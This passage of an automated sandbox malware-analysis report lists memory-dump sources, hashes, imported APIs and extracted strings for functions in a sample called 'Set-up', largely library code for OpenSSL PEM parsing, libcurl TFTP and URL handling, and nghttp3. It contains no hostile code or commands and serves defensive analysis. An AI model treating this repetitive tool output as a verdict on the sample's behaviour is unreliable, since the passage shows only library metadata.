                            • Opcode Fuzzy Hash: 32e4f5da268470414a5a86d4ea9c5e0dda63a4b2dc631fb296ec90f9c9f4d285
                            • Instruction Fuzzy Hash: 96C1E571914B459BD322CF38C881BE6B7F1FF99300F109A1EE5EEA6241EB70A584CB51
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: 28e796d660d537670e66c92292482ab44b2cf53cb5876e685f624cd56670e07c
                            • Instruction ID: 2c8d374a2e250ce2aa4f8ea7309cea6043eabc0bf51356306cc0925d6924834b
                            • Opcode Fuzzy Hash: 28e796d660d537670e66c92292482ab44b2cf53cb5876e685f624cd56670e07c
                            • Instruction Fuzzy Hash: AF81E872D14B828BD3158F64C8906B6B7E0FFDA314F249B5EE8E617782E7789580C781
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
                            • Instruction ID: 3d6eafe297a2e997284cdd9fba23ab24e0b8d053e16e449a5b7d40cac01fe306
                            • Opcode Fuzzy Hash: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
                            • Instruction Fuzzy Hash: F571B1751042168BC7199F6DE5D4169FBE1FF88310F29CBADDA998B342D638EC94CB80
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                            • Instruction ID: a542704c0d11839d77e2ed2b34564b6cf9b165d324562f54023142b2feef9c1f
                            • Opcode Fuzzy Hash: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                            • Instruction Fuzzy Hash: 7671C1715042168BC7199F6DD5D4169FBE1FF88300F2ACBADDA9987342D234EC95CB81
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                            • Instruction ID: 10ad678d57909ca3e1683c086ca719d39027f4aeb2b51a422d30d7ff40cf541f
                            • Opcode Fuzzy Hash: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                            • Instruction Fuzzy Hash: 32511472B093418BD7049E5C888026EB7D2FBAA314F2987BCD49E8B353C3349C46C791
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                            • Instruction ID: f237f3833f07f87fa13dfebab53cc8b372b3b0b60971186161ef487e3a114734
                            • Opcode Fuzzy Hash: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                            • Instruction Fuzzy Hash: C3518D76A086259BC7189F19C1D012DFBE2BBC8704F15C6ADD9AE67781C330AD64CBC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                            • Instruction ID: f62b6d51f8a8fec6b6031efbfa9aea58fc9713f254c66d51617b9164aa1448a3
                            • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                            • Instruction Fuzzy Hash: E931C33130831A8BEB14BD6DD4C422AF6D39BD8360F55C67EE589C33A4E9729C49D782
                            APIs
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 009F85B6
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ANY PRIVATE KEY), ref: 009F85CC
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PARAMETERS), ref: 009F85E2
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X9.42 DH PARAMETERS), ref: 009F85F8
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DH PARAMETERS), ref: 009F860A
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X509 CERTIFICATE), ref: 009F8620
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 009F8634
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NEW CERTIFICATE REQUEST), ref: 009F864A
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE REQUEST), ref: 009F865C
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 009F8672
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 009F86A0
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 009F86BA
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 009F86D0
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 009F86E2
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 009F86FC
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 009F8712
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 009F872A
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 009F8686
                              • Part of subcall function 009DCBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,009B7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,009B40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009DCBD2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strcmp$free
                            • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
                            • API String ID: 3401341699-4246700284
                            • Opcode ID: 51bd56718f01a5864f0104c212d27844262c125440def80ca30bf37da4a099ba
                            • Instruction ID: ffde2cdae4f30bdfcd28e0afb27d6146ffa0178c04959d1ad2a6d7e781d23646
                            • Opcode Fuzzy Hash: 51bd56718f01a5864f0104c212d27844262c125440def80ca30bf37da4a099ba
                            • Instruction Fuzzy Hash: 84B12DB1B843056BD65036206C07FBB369C5FA179AF084428FE58A12D3FFA6D619D363
                            APIs
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0087204A
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00872068
                            • WSAGetLastError.WS2_32 ref: 008720DE
                            • recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 0087214D
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00872365
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 0087238F
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008723B9
                            • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 0087241D
                            • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 008724AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
                            • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                            • API String ID: 3302935713-3407012168
                            • Opcode ID: ab385f1f07bb14d552df36f649ded1ba905e728dfa1ca4dac95f09b3a16ecb3f
                            • Instruction ID: b168e8e1834d13fbf3b787134213f289af257e906bf4f3941bebbf5647a643e1
                            • Opcode Fuzzy Hash: ab385f1f07bb14d552df36f649ded1ba905e728dfa1ca4dac95f09b3a16ecb3f
                            • Instruction Fuzzy Hash: FDE1DDB1A04305ABD710AB28DC42B6AB7E4FF94714F088528F84DD72AAE774ED44C792
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 008AA29A
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 008AA2C5
                            • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 008AA2E3
                              • Part of subcall function 008AA5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 008AA5FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy$memmove
                            • String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
                            • API String ID: 1283327689-1606465060
                            • Opcode ID: d8419d6743ee9e30f1e4b83f02513ba8ec7cdbc662a4e59c645fcdd931bd5ec4
                            • Instruction ID: 070064dcb521d57d86e4bce2b7d157c70a6cb9f8b85c5c5d94375123d9bb3a4a
                            • Opcode Fuzzy Hash: d8419d6743ee9e30f1e4b83f02513ba8ec7cdbc662a4e59c645fcdd931bd5ec4
                            • Instruction Fuzzy Hash: F0C127316043059FDB18DF08CC859A9B7A5FF89314F54852DF84A9BAD2D770ED84CB92
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00872AD7
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00872B3D
                            • sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00872D30
                            • WSAGetLastError.WS2_32 ref: 00872D3A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen$ErrorLastsendto
                            • String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
                            • API String ID: 3285375004-3063461439
                            • Opcode ID: faf52c8879608e7cae9f5b3f57b881d54d5562c7ee201ddfd544fed8306bd323
                            • Instruction ID: cda06c72ae9e9be1eb59ec32f890e71aaf00c4234c2ea12fc1c671d926be9376
                            • Opcode Fuzzy Hash: faf52c8879608e7cae9f5b3f57b881d54d5562c7ee201ddfd544fed8306bd323
                            • Instruction Fuzzy Hash: C9E1D7B1A04305ABD714AB18DC46F66B794FB55708F088568FD0CDB396EB72E8148793
                            APIs
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00824749
                            • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 008248E5
                            • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0082491B
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824963
                            • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00824971
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0082497B
                              • Part of subcall function 008206F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00825663,?), ref: 008206F9
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824A41
                            • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00824A63
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824A6D
                            • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00824AE0
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824AEA
                            • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00824B28
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824B34
                            • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00824B76
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824B80
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _errno$strtoul$strchr$memchrstrlen
                            • String ID: %ld$%u.%u.%u.%u$urlapi.c
                            • API String ID: 102816355-2423153182
                            • Opcode ID: 7fae309444937eee491bddb193786f686a32974b545071b9ef0269265e6d9dca
